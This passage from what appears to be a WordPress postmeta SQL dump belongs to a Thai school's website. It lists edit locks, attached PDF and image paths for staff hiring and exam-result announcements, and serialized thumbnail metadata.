(25201, 10205, '_edit_lock', '1591344484:14'),
(25202, 10205, '_edit_last', '14'),
(25203, 10205, '_hide_featured', NULL),
(25204, 10212, '_edit_lock', '1592394134:1'),
(25205, 10212, '_edit_last', '1'),
(25206, 10213, '_wp_attached_file', '2020/06/ประกาศรายชื่อผลการคัดเลือกนักเรียนทุน.pdf'),
(25209, 10212, '_hide_featured', NULL),
(25210, 10216, '_edit_lock', '1592466874:14'),
(25211, 10216, '_edit_last', '14'),
(25212, 10217, '_wp_attached_file', '2020/06/ประกาศรายชื่อผู้สอบผ่านสาขาการตลาด.pdf'),
(25215, 10216, '_hide_featured', NULL),
(25218, 10219, '_edit_lock', '1593064297:14'),
(25219, 10219, '_edit_last', '14'),
(25220, 10220, '_wp_attached_file', '2020/06/ประกาศรับครูจ้าง-IT.pdf'),
(25223, 10219, '_hide_featured', NULL),
(25226, 10223, '_edit_lock', '1593148529:1'),
(25227, 10223, '_edit_last', '1'),
(25228, 10223, '_cg_img_link', 'https://drive.google.com/file/d/1aHOy1j_2jwb7QIJOQOfw1ZmSg4QiO1tU/view?usp=sharing'),
(25229, 10223, '_cg_link_target', ''),
(25232, 10223, '_hide_featured', NULL),
(25233, 10226, '_edit_lock', '1593492437:14'),
(25234, 10226, '_edit_last', '14'),
(25235, 10227, '_wp_attached_file', '2020/06/ประกาศชื่อครูแมคคาฯ.pdf'),
(25238, 10226, '_hide_featured', NULL),
(25241, 10230, '_edit_lock', '1593674864:14'),
(25242, 10230, '_edit_last', '14'),
(25243, 10231, '_wp_attached_file', '2020/07/195922.jpg'),
(25244, 10231, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1076;s:6:\"height\";i:1522;s:4:\"file\";s:18:\"2020/07/195922.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"195922-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"195922-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"195922-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"195922-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"195922-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25245, 10232, '_wp_attached_file', '2020/07/195923.jpg'),
(25246, 10232, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1076;s:6:\"height\";i:1522;s:4:\"file\";s:18:\"2020/07/195923.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"195923-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"195923-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"195923-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"195923-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"195923-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25249, 10230, '_hide_featured', NULL),
(25252, 10238, '_edit_lock', '1594701810:14'),
(25253, 10238, '_edit_last', '14'),
(25254, 10239, '_wp_attached_file', '2020/07/ประกาศผลครูสาขา-IT.pdf'),
(25257, 10238, '_hide_featured', NULL),
(25260, 10241, '_edit_lock', '1593768885:14'),
(25261, 10241, '_edit_last', '14'),
(25262, 10242, '_wp_attached_file', '2020/07/ประกาศรับครู-IT-รอบ-2.pdf'),
(25265, 10241, '_hide_featured', NULL),
(25268, 10245, '_edit_lock', '1594177719:14'),
(25269, 10245, '_edit_last', '14'),
(25272, 10245, '_hide_featured', NULL),
(25279, 10252, '_wp_attached_file', '2019/12/107894123_620988641864977_7761992007497764748_n.jpg'),
(25280, 10252, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2019/12/107894123_620988641864977_7761992007497764748_n.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"107894123_620988641864977_7761992007497764748_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"107894123_620988641864977_7761992007497764748_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"107894123_620988641864977_7761992007497764748_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25281, 10256, '_edit_lock', '1594715424:14'),
(25282, 10256, '_edit_last', '14'),
(25283, 10257, '_wp_attached_file', '2020/07/ประกาศรับครูอิเล็ก.pdf'),
(25286, 10256, '_hide_featured', NULL),
(25289, 10260, '_wp_attached_file', '2019/12/110562114_2595261160577220_3354410114959396725_o.jpg'),
(25290, 10260, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:874;s:6:\"height\";i:1161;s:4:\"file\";s:60:\"2019/12/110562114_2595261160577220_3354410114959396725_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"110562114_2595261160577220_3354410114959396725_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"110562114_2595261160577220_3354410114959396725_o-226x300.jpg\";s:5:\"width\";i:226;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"110562114_2595261160577220_3354410114959396725_o-768x1020.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1020;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"110562114_2595261160577220_3354410114959396725_o-771x1024.jpg\";s:5:\"width\";i:771;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"110562114_2595261160577220_3354410114959396725_o-226x300.jpg\";s:5:\"width\";i:226;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25291, 10263, '_edit_lock', '1595394520:14'),
(25292, 10263, '_edit_last', '14'),
(25293, 10264, '_wp_attached_file', '2020/07/ประกาศรายชื่อครูอัตราจ้าง-IT.pdf'),
(25294, 10265, '_wp_attached_file', '2020/07/ประกาศรายชื่อครูอัตราจ้าง-IT-1.pdf'),
(25297, 10263, '_hide_featured', NULL),
(25300, 10267, '_wp_attached_file', '2019/12/110989862_1823204627817010_7982374874892002933_n.jpg'),
(25301, 10267, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1448;s:4:\"file\";s:60:\"2019/12/110989862_1823204627817010_7982374874892002933_n.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"110989862_1823204627817010_7982374874892002933_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"110989862_1823204627817010_7982374874892002933_n-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"110989862_1823204627817010_7982374874892002933_n-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"110989862_1823204627817010_7982374874892002933_n-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"110989862_1823204627817010_7982374874892002933_n-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25302, 10269, '_wp_attached_file', '2019/12/220763.jpg'),
(25303, 10269, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:945;s:4:\"file\";s:18:\"2019/12/220763.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"220763-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"220763-300x114.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:114;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"220763-768x293.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"220763-1024x390.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:390;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"220763-400x152.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25304, 10272, '_edit_lock', '1595399400:14'),
(25305, 10272, '_edit_last', '14'),
(25306, 10273, '_wp_attached_file', '2020/07/ประกาศผลสอบครูIT.pdf'),
(25309, 10272, '_hide_featured', NULL),
(25314, 10275, '_wp_attached_file', '2020/07/ปฏิทินปฏิบัติงานปีการศึกษา-2562.pdf'),
(25315, 10279, '_edit_lock', '1595467185:14'),
(25316, 10279, '_edit_last', '14'),
(25317, 10279, '_hide_featured', NULL),
(25318, 10286, '_edit_lock', '1595983827:14'),
(25319, 10286, '_edit_last', '14'),
(25320, 10287, '_wp_attached_file', '2020/07/การขายทอดตลาด.pdf'),
(25323, 10286, '_hide_featured', NULL),
(25326, 10291, '_edit_lock', '1595984171:14'),
(25327, 10291, '_edit_last', '14'),
(25328, 10292, '_wp_attached_file', '2020/07/ชุดที่-1.pdf'),
(25329, 10291, '_hide_featured', NULL),
(25330, 10294, '_edit_lock', '1595984227:14'),
(25331, 10294, '_edit_last', '14'),
(25332, 10295, '_wp_attached_file', '2020/07/ชุดที่-2.pdf'),
(25333, 10294, '_hide_featured', NULL),
(25334, 10299, '_edit_lock', '1596021625:14'),
(25335, 10299, '_edit_last', '14'),
(25336, 10300, '_wp_attached_file', '2020/07/ประกาศรายชื่อ-ชอ.pdf'),
(25339, 10299, '_hide_featured', NULL),
(25342, 10302, '_edit_lock', '1596021941:14'),
(25343, 10302, '_edit_last', '14'),
(25344, 10303, '_wp_attached_file', '2020/07/202007291811.pdf'),
(25347, 10302, '_hide_featured', NULL),
(25350, 10305, '_edit_lock', '1596167614:14'),
(25351, 10305, '_edit_last', '14'),
(25352, 10306, '_wp_attached_file', '2020/07/ประกาศผู้สอบผ่าน-ชอ.pdf'),
(25355, 10305, '_hide_featured', NULL),
(25358, 10308, '_edit_lock', '1596436302:14'),
(25359, 10308, '_edit_last', '14'),
(25360, 10309, '_wp_attached_file', '2020/08/ประกาศรับเจ้าหน้าที่งานทะเบียน.pdf'),
(25363, 10308, '_hide_featured', NULL),
(25370, 10311, '_wp_attached_file', '2019/12/511fbfb7-d11a-4bfb-829d-7aadf17d2765.png'),
(25371, 10311, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:160;s:6:\"height\";i:113;s:4:\"file\";s:48:\"2019/12/511fbfb7-d11a-4bfb-829d-7aadf17d2765.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"511fbfb7-d11a-4bfb-829d-7aadf17d2765-150x113.png\";s:5:\"width\";i:150;s:6:\"height\";i:113;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25372, 10312, '_wp_attached_file', '2019/12/ป้ายประชาสัมพันธ์1-1_page-0001.jpg'),
(25373, 10312, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1754;s:6:\"height\";i:1241;s:4:\"file\";s:76:\"2019/12/ป้ายประชาสัมพันธ์1-1_page-0001.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:76:\"ป้ายประชาสัมพันธ์1-1_page-0001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:76:\"ป้ายประชาสัมพันธ์1-1_page-0001-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:76:\"ป้ายประชาสัมพันธ์1-1_page-0001-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:77:\"ป้ายประชาสัมพันธ์1-1_page-0001-1024x725.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:76:\"ป้ายประชาสัมพันธ์1-1_page-0001-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25374, 10315, '_edit_lock', '1596792276:14'),
(25375, 10315, '_edit_last', '14'),
(25376, 10316, '_wp_attached_file', '2020/08/08-07-2020-16.15.551.pdf'),
(25379, 10315, '_hide_featured', NULL),
(25382, 10318, '_wp_attached_file', '2019/12/ใบประกาศรับสมัคร.jpg'),
(25383, 10318, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1700;s:6:\"height\";i:2200;s:4:\"file\";s:60:\"2019/12/ใบประกาศรับสมัคร.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"ใบประกาศรับสมัคร-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"ใบประกาศรับสมัคร-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"ใบประกาศรับสมัคร-768x994.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"ใบประกาศรับสมัคร-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"ใบประกาศรับสมัคร-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25384, 10320, '_edit_lock', '1597287232:14'),
(25385, 10320, '_edit_last', '14'),
(25386, 10321, '_wp_attached_file', '2020/08/13086301.jpg'),
(25387, 10321, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086301.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086301-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086301-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086301-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086301-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086301-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25388, 10320, '_thumbnail_id', '10321'),
(25391, 10320, '_hide_featured', NULL),
(25394, 10323, '_edit_lock', '1597287426:14'),
(25395, 10324, '_wp_attached_file', '2020/08/13086302.jpg'),
(25396, 10324, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086302.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086302-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086302-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086302-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086302-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086302-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25397, 10323, '_edit_last', '14'),
(25398, 10325, '_wp_attached_file', '2020/08/13086302-1.jpg'),
(25399, 10325, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:22:\"2020/08/13086302-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"13086302-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"13086302-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"13086302-1-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"13086302-1-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"13086302-1-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25400, 10323, '_thumbnail_id', '10325'),
(25403, 10323, '_hide_featured', NULL),
(25408, 10327, '_edit_lock', '1597287476:14'),
(25409, 10327, '_edit_last', '14'),
(25410, 10328, '_wp_attached_file', '2020/08/13086303.jpg'),
(25411, 10328, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086303.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086303-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086303-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086303-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086303-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086303-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25412, 10327, '_thumbnail_id', '10328'),
(25415, 10327, '_hide_featured', NULL),
(25418, 10330, '_edit_lock', '1597287638:14'),
(25419, 10330, '_edit_last', '14'),
(25420, 10331, '_wp_attached_file', '2020/08/13086304.jpg'),
(25421, 10331, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086304.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086304-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086304-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086304-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086304-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086304-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"